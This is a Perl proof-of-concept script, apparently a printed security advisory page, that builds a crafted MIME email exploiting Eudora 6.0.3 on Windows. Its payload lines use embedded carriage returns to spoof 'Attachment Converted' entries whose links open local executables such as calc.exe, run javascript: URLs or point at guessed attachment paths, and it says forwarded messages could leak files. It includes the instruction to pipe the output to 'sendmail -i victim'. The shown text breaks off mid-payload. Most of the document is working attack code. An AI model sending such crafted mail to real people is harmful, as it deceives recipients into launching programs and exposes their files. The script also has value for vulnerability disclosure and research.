1 #!/usr/bin/perl −−
2
3 use MIME::Base64;
4
5 print "From: me\n";
6 print "To: you\n";
7 print "Subject: Eudora 6.0.3 on Windows spoof, LaunchProtect\n";
8 print "MIME−Version: 1.0\n";
9 print "Content−Type: multipart/mixed; boundary=\"zzz\"\n";
10 print "\n";
11 print "This is a multi−part message in MIME format.\n";
12 print "−−zzz\n";
13 print "Content−Type: text/plain\n";
14 print "Content−Transfer−Encoding: 7bit\n";
15 print "\n";
16
17 print "Pipe the output of this script into: sendmail −i victim\n";
18
19 print "\nWith spoofed attachments, we could ’steal’ files if the
20 message
21 was forwarded (not replied to).\n";
22
23 print "\nWithin plain−text email (or plain−text, inline MIME parts)
24
embedded
25 CR=x0d characters get converted internally into a NUL=x00 and ignored,
26
so we can spoof \"attachment converted\" lines:\n";
27
28 print "\nThe following work fine (but are boring and/or put up
29 warnings):\n";
30 print "Attachment Converted\r: \"c:\\winnt\\system32\\calc.exe\"\n";
31 print "Attachment Converted\r: c:\\winnt\\system32\\calc.exe\n";
32 print "(Note how JavaScript is done with IE, web with default browser
33 Netscape)\n";
34 print "Attachment Converted\r: <A
35
href=javascript:alert(%27hello%27)>hello.txt</a>\n";
36 print "Attachment Converted\r: <A
37
href=http://www.maths.usyd.edu.au:8000/u/psz/securepc.html#Eudoraxx>web.txt</a>\n";
38 print "Attachment Converted\r: <A
39
href=c:/winnt/system32/calc.exe>file.txt</a>\n";
40
41 print "\nIf we can guess the full path to the attach directory then can
42
change the name shown to anything we like, but get broken icon:\n";
43 print "Attachment Converted\r: <A
44
href=H:/eudora/attach/calc>file.txt</a>\n";
45
46 print "\nCuteness value only:\n";
47 print "Attachment Converted\r: <A
48
href=c:/winnt/system32/calc.exe>file1.txt</a> xyz <A href=c:/winnt/system32/calc.exe>file2.txt</a>\n";
49
50 print "\n<x−html>
51 With <b>HTML</b> <i>inclusions</i> we can do
52 <a href=c:/winnt/system32/calc.exe>file</a>,
Page 1/4
Eudora 6.0.3 Attach